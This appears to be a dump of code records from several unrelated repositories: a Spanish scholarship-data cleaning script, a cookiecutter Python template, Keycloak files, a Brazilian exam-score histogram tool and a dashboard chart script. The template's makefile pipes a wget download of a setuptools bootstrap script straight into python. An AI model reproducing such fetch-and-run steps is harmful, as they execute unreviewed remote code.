(alimentación+transporte+médicos+odontológico+personales+alquiler+estudio+recreación+otros)\n \n\"\"\"\noutput_data.TotalExpenses = output_data.apply(lambda x: x.Food+x.Transportation+x.Medical+x.Dental+x.Personal+x.Rental+x.Study+x.Entertainment+x.OtherExpenses, axis=1)\n\n\"\"\"\n --- Rating ---\n * Columna limpia, por lo que no se aplica ningún proceso \n\n\"\"\"\noutput_data.Rating = input_data[64]\n\n# Eliminando columnas que sirvieron para brindar integridad a otras pero que no aportan información relevante\n# Edad := 3 | Precio de Alquier := 52\noutput_data = output_data.drop(output_data.columns[[3, 52]], axis=1)\n\n# Generando salida\noutput_data.to_csv(project+'/dat/becas_crema.csv', \n\t\tindex=False, float_format='%.3f', \n\t\theader=['C.I.', 'Período Académico Renovado (Año)', 'Período Académico Renovado (ID)', 'Fecha de Nacimiento', 'Estado Civil', 'Sexo', 'Escuela', \n\t\t'Año de Ingreso', 'Modo de Ingreso', 'Promedio Ponderado', 'Eficiencia', 'Semestre', 'Materias Inscritas (Semestre y/o Año Anterior)', \n\t\t'Materias Aprobadas (Semestre y/o Año Anterior)', 'Materias Retiradas (Semestre y/o Año Anterior)', 'Materias Reprobadas (Semestre y/o Año Anterior)', \n\t\t'Motivo de Materias Reprobadas', 'Materias Inscritas Actualmente', 'Tesis Inscrita', 'Procedencia', 'Residencia', 'Compañeros de Habitación', \n\t\t'Cambio de Dirección', 'Tipo de Vivienda', 'Responsable Económico', 'Carga Familiar', 'Ingresos Responsable Económico', 'Otros Ingresos Responsable Económico', \n\t\t'Total de Ingresos Responsable Económico', 'Alimentación Responsable Económico', 'Transporte Responsable Económico', 'Gastos Médicos Responsable Económico', \n\t\t'Gastos Odontológicos Responsable Económico', 'Gastos de Estudio Responsable Económico', 'Servicios Públicos', 'Condominio', 'Otros Gastos Responsable Económico', \n\t\t'Total Egresos Responsable Económico', 'Ayuda financiera', 'Trabajo', 'Beca', 'Aporte de Responsable Económico', 'Aporte Familiar', 'Ingresos Laborales', \n\t\t'Ingresos Totales', 'Alimentación', 'Transporte', 'Gastos Médicos', 'Gastos Odontológicos', 'Gastos Personales', 'Gastos de Alquiler', 'Gastos Estudiantiles', \n\t\t'Recreación', 'Otros Gastos', 'Total Egresos', 'Puntación'],\n\t\tdate_format='%d/%m/%Y')" }, { "alpha_fraction": 0.7725694179534912, "alphanum_fraction": 0.7829861044883728, "avg_line_length": 25.090909957885742, "blob_id": "6d2be7f1a86ee038a61a2b64b7990d9f40e0e552", "content_id": "20eb21bd4bdc663358a1e4eabbd013a7794de826", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 582, "license_type": "no_license", "max_line_length": 78, "num_lines": 22, "path": "/README.md", "repo_name": "DataMiningUCV/preprocesamiento-de-datos-josseline06", "src_encoding": "UTF-8", "text": "# Becas Crema: Limpieza y Preparación de los Datos\n\n## Descripción\n\nDado un dataset acerca del proceso de renovación de becas, preparar la data\npara su posterior análisis.\n\nEsta solución ha sido desarrollada con Python 2.7\n\n## Requerimientos\n\nPara instalar los requerimientos necesarios para el funcionamiento de este\nproyecto debe hacer el siguiente comando\n\n```\npip install -r requeriments.txt\n\n```\nCabe destacar que debe correrse desde el directorio base del proyecto para la \nlocalización adecuada de los archivos de entrada como de salida.\n\n#####by Josseline Perdomo - Enero 2016\n\n\n" } ]
2
MrLYC/lpyprj
https://github.com/MrLYC/lpyprj
1f10dec34db20cd9e0dbdbfe1c3aec3181f9a7d5
2ab3747872791bafa05b85778bbae98955c39625
6c3d76145e5bb0878ce7972b3edd266e09033aba
refs/heads/master
2020-12-14T08:54:32.416041
2015-07-03T07:36:44
2015-07-03T07:37:10
23,572,569
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6231505870819092, "alphanum_fraction": 0.6301131248474121, "avg_line_length": 25.720930099487305, "blob_id": "00c1cc4b201327a19d85158734043a7ad9b062e7", "content_id": "99bcb351e36abc4032043d7eb4baa6378f9e989f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1149, "license_type": "no_license", "max_line_length": 75, "num_lines": 43, "path": "/{{cookiecutter.repo_name}}/setup.py", "repo_name": "MrLYC/lpyprj", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n\nimport os\nimport sys\n\ntry:\n from setuptools import setup\nexcept ImportError:\n from distutils.core import setup\n\n\nfrom setuptools import find_packages\n\n\ndef requirements_file_to_list(fn=\"requirements.txt\"):\n with open(fn, 'rb') as f:\n return [x.rstrip() for x in list(f) if x and not x.startswith('#')]\n\n\nif sys.argv[-1] == 'publish':\n os.system('python setup.py sdist upload')\n sys.exit()\n\nsetup(\n name='{{ cookiecutter.project_name }}',\n version='{{ cookiecutter.version }}',\n description='{{ cookiecutter.project_short_description }}',\n long_description=open('README.rst', 'a+').read(),\n author='{{ cookiecutter.author }}',\n author_email='{{ cookiecutter.email }}',\n packages=find_packages(),\n install_requires=requirements_file_to_list(),\n license='BSD',\n classifiers=[\n 'Development Status :: 3 - Alpha',\n 'License :: OSI Approved :: BSD License',\n 'Natural Language :: English',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.6',\n 'Programming Language :: Python :: 2.7',\n ],\n)\n" }, { "alpha_fraction": 0.7454873919487, "alphanum_fraction": 0.75, "avg_line_length": 26.024391174316406, "blob_id": "5b750f43deee102084a6b423a2d6bce7588d84db", "content_id": "be4c28eca364c505a0c46cab6ef320f0248acf7a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1108, "license_type": "no_license", "max_line_length": 77, "num_lines": 41, "path": "/README.md", "repo_name": "MrLYC/lpyprj", "src_encoding": "UTF-8", "text": "# lpyprj\nThe project template created by LYC\n\n## Quick start\n### 1. clone the project.\nFrom github:\n`$ git clone https://github.com/MrLYC/lpyprj.git`\n\nOr from git@osc:\n`$ git clone https://git.oschina.net/Mr_LYC/lpyprj.git`\n\n### 2. install requirements.\nChange directory to project:\n`$ cd lpyprj`\n\nInstall pip to install requirements, if you didn't installed it yet:\n`$ sudo make setuptools`\n\nInstall requirements with sudo:\n`$ sudo make requirements`\n\n### 3. create your new project.\nUse cookiecutter to create your new project:\n`$ cookiecutter $path_of_lpyprj`\n\nReplace the var $path_of_lpyprj to the real path which the project lpyprj is.\nAnd then, input the infomations according to the hints to finish this step.\n\n### 4. initalize your project.\nFirst, change the directory to your project.\nThen, initalize git:\n`$ git init`\n\nMake virtual environment as your developing environment:\n`$ make dev-init`\n\n### 5. switch to the virtualenv of this project and start to develop\nSwitch your Python environment and anchor here:\n`$ source .dev/toggle`\n\nIf your want to switch your environment back, call it again.\n" }, { "alpha_fraction": 0.7480915784835815, "alphanum_fraction": 0.7480915784835815, "avg_line_length": 25.200000762939453, "blob_id": "38ff14c435b3b88b074f915a36085632f3b60836", "content_id": "29c050d4fc0d9c32674b0b3ffa9576ed405267a5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 262, "license_type": "no_license", "max_line_length": 79, "num_lines": 10, "path": "/makefile", "repo_name": "MrLYC/lpyprj", "src_encoding": "UTF-8", "text": "setuptools:\n\twget https://bootstrap.pypa.io/ez_setup.py -O - | python && rm setuptools*.zip\n\teasy_install pip\n\nrequirements: requirements.txt\n\tpip install -r requirements\n\nauthor-config:\n\tgit config user.email [email protected] --local\n\tgit config user.name MrLYC --local\n" }, { "alpha_fraction": 0.5901639461517334, "alphanum_fraction": 0.5983606576919556, "avg_line_length": 23.200000762939453, "blob_id": "97726977bc6317dd4d8954953c0ab1819adffd97", "content_id": "e5aeebacd5455876d5b115ce405f10629492d5c5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 122, "license_type": "no_license", "max_line_length": 40, "num_lines": 5, "path": "/{{cookiecutter.repo_name}}/{{cookiecutter.project_name}}/__init__.py", "repo_name": "MrLYC/lpyprj", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# encoding: utf-8\n\n__author__ = '{{ cookiecutter.author }}'\n__email__ = '{{ cookiecutter.email }}'\n\n" }, { "alpha_fraction": 0.5641025900840759, "alphanum_fraction": 0.7435897588729858, "avg_line_length": 18.5, "blob_id": "b01294950b2ef87ffbbe80af9836ac2eb90603e6", "content_id": "681f4e960a3456ba7b0ac3aa552685e462cc8438", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 39, "license_type": "no_license", "max_line_length": 19, "num_lines": 2, "path": "/requirements.txt", "repo_name": "MrLYC/lpyprj", "src_encoding": "UTF-8", "text": "cookiecutter==0.7.2\nvirtualenv==1.11.6\n" } ]
5
AtilioA/GraficosNotasUFES
https://github.com/AtilioA/GraficosNotasUFES
d01484cff36bce2e834b06c0839f506fab8aa099
350182f96718c77d10d17da8f63238c337cb6035
407639d4cf97487d6fb4cf8a8be8f981bee31884
refs/heads/master
2019-03-20T14:20:00.481725
2019-02-03T19:14:48
2019-02-03T19:14:48
123,958,948
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5817524790763855, "alphanum_fraction": 0.6027551889419556, "avg_line_length": 40, "blob_id": "f1da37d6051e005b57f9ea4732c6e559425e97d6", "content_id": "76cc31730552884c5d5ae27232af2bd190d8ef02", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4495, "license_type": "no_license", "max_line_length": 177, "num_lines": 108, "path": "/histogramanotas.py", "repo_name": "AtilioA/GraficosNotasUFES", "src_encoding": "UTF-8", "text": "import re\nimport os\nimport extras\nimport random\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.mlab as mlab\nfrom scipy.stats import norm # Uma função do mlab está sendo descontinuada e substituída por esta\n\n\n# Abre o diretório das notas e prepara apresentação para o usuário\npastaRepo = os.getcwd()\npastaHistogramas = os.path.join(pastaRepo, \"Histogramas\\\\\")\npastaHistogramasAleatórios = os.path.join(pastaRepo, \"Histogramas\\\\Aleatórios\\\\\")\npastaNotas = os.path.join(pastaRepo, \"Notas.txt\")\narquivos = os.listdir(f'{pastaNotas}')\narquivos = [w[:-4] for w in arquivos] # Remove '.txt' dos nomes dos arquivos\nopçãoArquivo = 'B'\n\n# Abre arquivo com notas, gera notas aleatórias e armazena em uma nova lista ou mostra arquivos disponíveis. Repete até o usuário entrar com 'Z'.\nwhile (opçãoArquivo not in 'Z'):\n opçãoArquivo = input('Insira o nome do arquivo [universidadeano], ou\\n[A] para dados aleatórios\\n[B] para mostrar os arquivos disponíveis\\n[Z] para sair\\n ').upper().strip()\n\n if opçãoArquivo in 'A':\n universidade = 'NOTAS ALEATÓRIAS'\n ano = ''\n notas = []\n idHistograma = extras.notasAleatorias()\n txt = open(f'{pastaNotas}\\\\notas2049.txt', 'r')\n for linha in txt:\n notas.append(float(linha))\n\n elif opçãoArquivo in 'B':\n print(\"\\nARQUIVOS DISPONÍVEIS: \")\n for i in range(1, len(arquivos) - 1):\n print(f'> {arquivos[i]:^40}',)\n print(\"\\n\")\n\n elif opçãoArquivo in 'Z':\n exit()\n\n elif opçãoArquivo not in 'ABZ':\n universidade = re.split('(\\\\d+)', opçãoArquivo)[0].strip()\n ano = (re.split('(\\\\d+)', opçãoArquivo)[1])\n print(\"\\n\", universidade, ano)\n idHistograma = f'{universidade} {ano}'\n notas = []\n txt = open(f'{pastaNotas}\\\\{opçãoArquivo}.txt', 'r')\n for linha in txt:\n notas.append(float(linha))\n\n if opçãoArquivo not in 'B':\n # Estatísticas das notas\n n = len(notas)\n minhaNota = 777 # Insira uma nota aqui para calcular o z-score dela\n mediaNotas = np.mean(notas)\n medianaNotas = np.median(notas)\n stdNotas = np.std(notas)\n zscore = (minhaNota - mediaNotas) / stdNotas\n # idHistograma = f'{mediaNotas:.2f}_{stdNotas:.2f}_{n}'\n\n print(f'A média das notas é {mediaNotas:.2f}.')\n print(f'A mediana das notas é {medianaNotas:.2f}.')\n print(f'O desvio padrão é de {stdNotas:.2f} pontos.')\n print(f'Seu z-score é {zscore:.2f}.\\n')\n\n menorNota = min(notas)\n maiorNota = max(notas)\n num_bins = int(np.ceil((maiorNota - menorNota) / 10))\n # plt.hist(notas, num_bins, normed = 0, FaceColor = [0.22745, 0.49412, 0.98824]) # Sem normalizar\n\n # Customização do histograma\n\n # Cores (converte RGB entre 0 e 255 para RGB entre 0 e 1)\n r, g, b = 56 / 255, 126 / 255, 252 / 255 # (azul)\n r2, g2, b2 = 214 / 255, 45 / 255, 32 / 255 # (vermelho)\n\n # Customização da linha de média (aleatória se os dados forem aleatórios)\n if opçãoArquivo not in 'A':\n marcador = ''\n estilo = '--'\n else:\n marcador = random.choice(['^', 'o', '.', '|', ',', 'p', '', '', ''])\n estilo = random.choice(['-', '--', '-.', ':'])\n\n # Construção do histograma\n fig = plt.figure()\n plt.title(f'{universidade} {ano}')\n plt.xlabel('Notas')\n plt.ylabel('Frequência')\n plt.subplots_adjust(left = 0.15)\n # Linha de média\n n, bins, _ = plt.hist(notas, num_bins, density = 1, FaceColor = [r, g, b])\n media = norm.pdf(bins, mediaNotas, stdNotas)\n plt.plot(bins, media, f'r{marcador}{estilo}')\n # Limites de nota e da frequência; o primeiro de acordo com as menores notas possíveis no ENEM, por exemplo\n # plt.axis([min, max, 0, 1000]) # se normed = 0 (sem normalizar o gráfico)\n plt.grid(True)\n # Salva .png do histograma\n if opçãoArquivo in 'A':\n pathHistograma = f'{pastaHistogramasAleatórios}{idHistograma}'\n plt.savefig(f'{pathHistograma}.png')\n print(f'Histograma salvo em {pastaHistogramasAleatórios}')\n else:\n pathHistograma = f'{pastaHistogramas}{idHistograma}'\n plt.savefig(f'{pathHistograma}.png')\n print(f'Histograma salvo em {pastaHistogramas}')\n plt.show()\n" }, { "alpha_fraction": 0.7384341359138489, "alphanum_fraction": 0.7882562279701233, "avg_line_length": 59.21428680419922, "blob_id": "6ab93a5d5064468d5770161adc782f4f4b1259a1", "content_id": "f923dc37fd9175ea88b2735d24a097571a5c86a7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1717, "license_type": "no_license", "max_line_length": 386, "num_lines": 28, "path": "/README.md", "repo_name": "AtilioA/GraficosNotasUFES", "src_encoding": "UTF-8", "text": "# GraficosNotasENEM\nTraçagem de histogramas das notas dos candidatos da UFES após a adesão desta ao SiSU, em 2016. Com gráficos de 2017 e 2018, incluindo lista de espera (candidatos que não foram aprovados na primeira chamada).\n\nUtilização do Python 3.6/3.7 junto de NumPy, Matplotlib, SciPy e expressões regulares para extrair notas dos arquivos com resultados divulgados pelas universidades. Pode ser utilizado com quaisquer notas (elas devem ser separadas por quebra de linha, sem uso de vírgulas), apenas usei minha realidade (UFES) como base.\n\n## Instruções: \nVocê vai precisar do Python 3.6, pelo menos (por conta das fstrings e etc), além de alguns módulos. Rode estes comandos no terminal para se certificar de que os têm instalados:\n\n```\npip install numpy\n\npip install matplotlib\n\npip install scipy\n```\n\nDepois, clone este repositório, abra o terminal na pasta do repositório e então execute:\n\n`python histogramanotas.py`.\n\n##\nDiferentes padrões de regex foram utilizados para extração das notas, de acordo com os padrões encontrados nos arquivos das universidades. Alguns incluíam documento do candidato (CPF, RG), por exemplo, e portanto precisaram de um maior refinamento da busca. Outros arquivos, como os da UFES, só possuíam como número a própria nota do candidato, então um padrão medíocre também serviria.\n\n![UFES 2017](Histogramas/ufes2017.png?raw=true \"UFES 2017\")\n![UFES 2018](Histogramas/ufes2018.png?raw=true \"UFES 2018\")\n![UFES 2018 (lista de espera)](Histogramas/ufes%20lista%20de%20espera2018.png?raw=true \"UFES 2018, lista de espera\")\n![UNIFEI 2017](Histogramas/unifei2017.png?raw=true \"UNIFEI2017\")\n![IFSC 2018](Histogramas/ifsc2018.png?raw=true \"IFSC 2018\")\n" }, { "alpha_fraction": 0.650943398475647, "alphanum_fraction": 0.6603773832321167, "avg_line_length": 12.25, "blob_id": "6283d525223b811ef58980ab4a6e80a8bd652d79", "content_id": "e2abf9117c8f1a9fe022f0f581682ed0cf3793ca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 106, "license_type": "no_license", "max_line_length": 35, "num_lines": 8, "path": "/Makefile", "repo_name": "AtilioA/GraficosNotasUFES", "src_encoding": "UTF-8", "text": "all:\n\tpy histogramanotas.py\n\nclean:\n\trmdir /s /q __pycache__\n\ncleanR:\n\tdel /s /q \"Histogramas\\ALEATR~1\\*\"\n" }, { "alpha_fraction": 0.5505263209342957, "alphanum_fraction": 0.6131578683853149, "avg_line_length": 35.53845977783203, "blob_id": "e53140d6b2014adbe7153a4277bd1eb69a9d07ba", "content_id": "0c54efdd7dd88e482c617a71f3c6dd6929a26203", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1922, "license_type": "no_license", "max_line_length": 98, "num_lines": 52, "path": "/extras.py", "repo_name": "AtilioA/GraficosNotasUFES", "src_encoding": "UTF-8", "text": "import os\nimport random\n\n\n# Gerador de .txt com notas aleatórias\ndef notasAleatorias():\n pastaRepo = os.getcwd()\n pastaNotas = os.path.join(pastaRepo, \"Notas.txt\")\n\n outfile = open(f'{pastaNotas}\\\\notas2049.txt', 'w+')\n\n tipo = random.randrange(1, 3)\n\n if tipo == 3:\n mu = random.randrange(625, 720) # Média aleatória\n sigma = random.randrange(10, 20) # Desvio padrão aleatório\n n = random.randrange(1000, 5000) # Tamanho de amostra aleatório\n\n elif tipo == 2:\n mu = random.randrange(605, 760) # Média aleatória\n sigma = random.randrange(5, 25) # Desvio padrão aleatório\n n = random.randrange(800, 7000) # Tamanho de amostra aleatório\n\n elif tipo == 1:\n mu = random.randrange(650, 770) # Média aleatória\n sigma = random.randrange(10, 30) # Desvio padrão aleatório\n n = random.randrange(2000, 6000) # Tamanho de amostra aleatório\n\n # Cria números de acordo com a distribuição desejada e escreve apropriadamente no arquivo .txt\n for _ in range(n):\n num = round((random.weibullvariate(mu, sigma)), 2)\n outfile.write(f'{num}\\n')\n\n idHistograma = f'{mu}_{sigma}_{n}' # Nomear histogramas aleatórios com dados da amostra gerada\n return str(idHistograma)\n\n # Criar ruído (FALTA TESTAR SE ISSO FAZ SENTIDO)\n # for _ in range(10,100):\n # num2 = round(random.uniform(700,800), 2)\n # outfile.write(f'{num2}\\n')\n # for _ in range(50,300):\n # num2 = round(random.uniform(600,700), 2)\n # outfile.write(f'{num2}\\n')\n # for _ in range(5,50):\n # num2 = round(random.uniform(500,600), 2)\n # outfile.write(f'{num2}\\n')\n # for _ in range(10,20):\n # num2 = round(random.uniform(770,810), 2)\n # outfile.write(f'{num2}\\n')\n\n outfile.close()\n print('\\nDados aleatórios escritos em notas2049.txt')\n" } ]
4
basireddyshreya/Chatbot
https://github.com/basireddyshreya/Chatbot
095c6662f3a21f0c8e4fb829c81511e899840853
9ff4b2b3b59112721f573d0f5be4d0a27483923b
0d7dbf772bacc9d814ee9c3285b646cb8fa2f1d6
refs/heads/master
2020-03-26T04:36:58.234613
2018-08-13T01:08:51
2018-08-13T01:08:51
144,513,023
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7099999785423279, "alphanum_fraction": 0.7250000238418579, "avg_line_length": 27.714284896850586, "blob_id": "4318a3075b5607b06296c27470adda729fd49fe9", "content_id": "d9c54546d2a67dd1058be0df1e06804e5b266129", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 200, "license_type": "permissive", "max_line_length": 41, "num_lines": 7, "path": "/chatbotarticle1.py", "repo_name": "basireddyshreya/Chatbot", "src_encoding": "UTF-8", "text": "def evaluateRecall(y, yTest, k=1):\n\tnumExamples = float(len(y))\n\tnumCorrect = 0\n\tfor predictions, label in zip(y, yTest):\n\t\tif label in predictions[:k]:\n\t\t\tnumCorrect+=1\n\treturn numCorrect/numExamples" } ]
1
canattofilipe/keycloak
https://github.com/canattofilipe/keycloak
439a6d66355e5c81ef3f06b1cf6c3d1bc33beaaf
7ad1c350a320e8c84d662d6ba57285a56a419c5f
865dc42504bc48279f5b059e3854b88c1ef2adaf
refs/heads/master
2023-01-08T13:01:01.766406
2020-11-12T13:42:51
2020-11-12T16:21:08
276,911,273
0
0
Apache-2.0
2020-07-03T13:52:10
2020-07-03T12:07:52
2020-07-03T13:38:06
null
[ { "alpha_fraction": 0.671999990940094, "alphanum_fraction": 0.8320000171661377, "avg_line_length": 62, "blob_id": "8e6f21ef7108e512a9cc126dfb66b5ec51348dd5", "content_id": "a4cfa2f4388583fa4ef435f7c5f3111969ab3654", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 125, "license_type": "permissive", "max_line_length": 88, "num_lines": 2, "path": "/testsuite/integration-arquillian/tests/other/base-ui/src/main/resources/themes/localized-theme-preview/account/theme.properties", "repo_name": "canattofilipe/keycloak", "src_encoding": "UTF-8", "text": "parent=${theme-default-name}-preview\nlocales=en,de,lang01,lang02,lang03,lang04,lang05,test,lang06,lang07,lang08,lang09,lang10" }, { "alpha_fraction": 0.7400521636009216, "alphanum_fraction": 0.7429876327514648, "avg_line_length": 41, "blob_id": "d5695b0ba5b36f582668e7c1077f9bbd388618ea", "content_id": "676cce05d411d9c3fc0349c662f492453854b195", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 3066, "license_type": "permissive", "max_line_length": 134, "num_lines": 73, "path": "/server-spi/src/main/java/org/keycloak/storage/federated/UserFederatedUserCredentialStore.java", "repo_name": "canattofilipe/keycloak", "src_encoding": "UTF-8", "text": "/*\n * Copyright 2016 Red Hat, Inc. and/or its affiliates\n * and other contributors as indicated by the @author tags.\n *\n * Licensed under the Apache License, Version 2.0 (the \"License\");\n * you may not use this file except in compliance with the License.\n * You may obtain a copy of the License at\n *\n * http://www.apache.org/licenses/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS,\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n * See the License for the specific language governing permissions and\n * limitations under the License.\n */\npackage org.keycloak.storage.federated;\n\nimport org.keycloak.credential.CredentialModel;\nimport org.keycloak.models.RealmModel;\nimport org.keycloak.provider.Provider;\n\nimport java.util.List;\nimport java.util.stream.Collectors;\nimport java.util.stream.Stream;\n\n/**\n * @author <a href=\"mailto:[email protected]\">Bill Burke</a>\n * @version $Revision: 1 $\n */\npublic interface UserFederatedUserCredentialStore extends Provider {\n void updateCredential(RealmModel realm, String userId, CredentialModel cred);\n CredentialModel createCredential(RealmModel realm, String userId, CredentialModel cred);\n boolean removeStoredCredential(RealmModel realm, String userId, String id);\n CredentialModel getStoredCredentialById(RealmModel realm, String userId, String id);\n\n /**\n * @deprecated Use {@link #getStoredCredentialsStream(RealmModel, String) getStoredCredentialsStream} instead.\n */\n @Deprecated\n default List<CredentialModel> getStoredCredentials(RealmModel realm, String userId) {\n return this.getStoredCredentialsStream(realm, userId).collect(Collectors.toList());\n }\n\n /**\n * Obtains the credentials associated with the federated user identified by {@code userId}.\n *\n * @param realm a reference to the realm.\n * @param userId the user identifier.\n * @return a non-null {@code Stream} of credentials.\n */\n Stream<CredentialModel> getStoredCredentialsStream(RealmModel realm, String userId);\n\n /**\n * @deprecated Use {@link #getStoredCredentialsByTypeStream(RealmModel, String, String) getStoredCredentialsByTypeStream} instead.\n */\n @Deprecated\n default List<CredentialModel> getStoredCredentialsByType(RealmModel realm, String userId, String type) {\n return this.getStoredCredentialsByTypeStream(realm, userId, type).collect(Collectors.toList());\n }\n\n /**\n * Obtains the credentials of type {@code type} that are associated with the federated user identified by {@code userId}.\n *\n * @param realm a reference to the realm.\n * @param userId the user identifier.\n * @param type the credential type.\n * @return a non-null {@code Stream} of credentials.\n */\n Stream<CredentialModel> getStoredCredentialsByTypeStream(RealmModel realm, String userId, String type);\n\n CredentialModel getStoredCredentialByNameAndType(RealmModel realm, String userId, String name, String type);\n}\n" }, { "alpha_fraction": 0.8571428656578064, "alphanum_fraction": 0.8571428656578064, "avg_line_length": 29.66666603088379, "blob_id": "3e4e92bd61ac56d25d592df2ad12e9276aaa4328", "content_id": "9396728c7d2e027e0ee134f2cdd284cee0a055db", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 91, "license_type": "permissive", "max_line_length": 33, "num_lines": 3, "path": "/quarkus/deployment/src/test/resources/application.properties", "repo_name": "canattofilipe/keycloak", "src_encoding": "UTF-8", "text": "quarkus.http.root-path=/auth\nquarkus.application.name=Keycloak\nquarkus.banner.enabled=false" }, { "alpha_fraction": 0.7102510333061218, "alphanum_fraction": 0.7179219126701355, "avg_line_length": 41.17647171020508, "blob_id": "b8ca335b8a7efd05409da1495b44204a358c7add", "content_id": "94fcfaed95132bfef44bcc49fee18abffb137fe4", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2868, "license_type": "permissive", "max_line_length": 122, "num_lines": 68, "path": "/misc/scripts/upgrade-wildfly/upgrade-keycloak-to-wildfly-tag.py", "repo_name": "canattofilipe/keycloak", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n# *\n# * Copyright 2020 Red Hat, Inc. and/or its affiliates\n# * and other contributors as indicated by the @author tags.\n# *\n# * Licensed under the Apache License, Version 2.0 (the \"License\");\n# * you may not use this file except in compliance with the License.\n# * You may obtain a copy of the License at\n# *\n# * http://www.apache.org/licenses/LICENSE-2.0\n# *\n# * Unless required by applicable law or agreed to in writing, software\n# * distributed under the License is distributed on an \"AS IS\" BASIS,\n# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# * See the License for the specific language governing permissions and\n# * limitations under the License.\n# *\n# *\n#\n# Purpose: Update various necessary bits of Keycloak to align with the specified Wildfly tag. Perform this by:\n#\n# * Incrementing the jboss-parent element version if necessary,\n# * Updating versions of artifacts shared with Wildfly and Wildfly Core in main Keycloak pom.xml file,\n# * Updating versions of artifacts shared with Wildfly and Wildfly Core utilized by Keycloak adapters\n#\n# Usage: Run as, e.g.:\n# ./upgrade-keycloak-to-wildfly-tag.py 20.0.0.Final\n#\n# Or call the script without arguments to get the further help\n\nimport os, sys\n\nimport wildfly.upgrade as wu\n\ndef usage():\n print(\"Run as: \\n\\t%s Wildfly.Tag.To.Upgrade.To \\ne.g.:\\n\\t%s 20.0.0.Final\\n\" % (sys.argv[0], sys.argv[0]))\n\nif __name__ == '__main__':\n\n if len(sys.argv) != 2:\n usage()\n sys.exit(1)\n\n wildflyTag = wu.isWellFormedWildflyTag(sys.argv[1])\n wildflyPomBaseUrl = \"https://github.com/wildfly/wildfly/raw/%s/pom.xml\" % wildflyTag\n\n wu.getModuleLogger().info(\"Retrieving Wildfly's pom.xml for tag: %s\" % wildflyTag)\n wildflyPomFile = wu.saveUrlToNamedTemporaryFile(wildflyPomBaseUrl)\n\n wildflyPomXmlRoot = wu.getXmlRoot(wildflyPomFile)\n wildflyCoreTag = wu.isWellFormedWildflyTag( wu.getPomProperty(wildflyPomXmlRoot, \"version.org.wildfly.core\")[0].text )\n wildflyCorePomBaseUrl = \"https://github.com/wildfly/wildfly-core/raw/%s/pom.xml\" % wildflyCoreTag\n\n wu.getModuleLogger().info(\"Retrieving Wildfly-Core pom.xml for tag: %s\" % wildflyCoreTag)\n wildflyCorePomFile = wu.saveUrlToNamedTemporaryFile(wildflyCorePomBaseUrl)\n\n if wildflyPomFile != None and wildflyCorePomFile != None:\n\n # Subtask - Update main Keycloak pom.xml file\n wu.updateMainKeycloakPomFile(wildflyPomFile, wildflyCorePomFile)\n # Subtask - Update Keycloak adapters\n wu.performKeycloakAdapterLicenseFilesUpdateTask(wildflyPomFile, wildflyCorePomFile)\n # Subtask - Update RH-SSO adapters\n wu.performRhssoAdapterLicenseFilesUpdateTask(wildflyPomFile, wildflyCorePomFile)\n\n for filename in [wildflyPomFile, wildflyCorePomFile]:\n os.remove(filename)\n" } ]
4
valerybondarev/dashboard
https://github.com/valerybondarev/dashboard
bf04d31234c4fc1b7fc1b1f05762289056bb54ac
90857f4902b48e67525b5011395d1a416e4cba7d
1d2ba0b6e6d6f293dd3de6f87671fbdea0ab8f9c
refs/heads/master
2020-08-04T18:28:09.869327
2019-10-02T02:28:45
2019-10-02T02:28:45
212,236,619
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.45644834637641907, "alphanum_fraction": 0.48615801334381104, "avg_line_length": 21.393939971923828, "blob_id": "f1df2c9f8c197d365172f09e775dad1a492a95fd", "content_id": "72bcffce764ac645afb311002c050c8aa70d60e1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1481, "license_type": "no_license", "max_line_length": 70, "num_lines": 66, "path": "/static/js/dashboard.js", "repo_name": "valerybondarev/dashboard", "src_encoding": "UTF-8", "text": "\nvar months;\nvar critical_data;\nvar high_data;\nvar medium_data;\nvar low_data;\n\n $(document).ready(function () {\n $.ajax({\n url: '/get_report_data',\n type: 'post',\n success: function (response) {\n console.log(response);\n months = response['months'];\n critical_data = response['critical_data'];\n high_data = response['high_data'];\n medium_data = response['medium_data'];\n low_data = response['low_data'];\n\n\n var ctx = document.getElementById('myChart').getContext('2d');\n var myChart = new Chart(ctx, {\n type: 'line',\n data: {\n labels: months,\n datasets: [{\n label: 'Critical',\n data: critical_data,\n backgroundColor: \"rgba(237,85,101,0.7)\"\n }, {\n label: 'High',\n data: high_data,\n backgroundColor: \"rgba(248,172,89,1)\"\n }, {\n label: 'Medium',\n data: medium_data,\n backgroundColor: \"rgba(35,198,200,0.8)\"\n }, {\n label: 'Low',\n data: low_data,\n 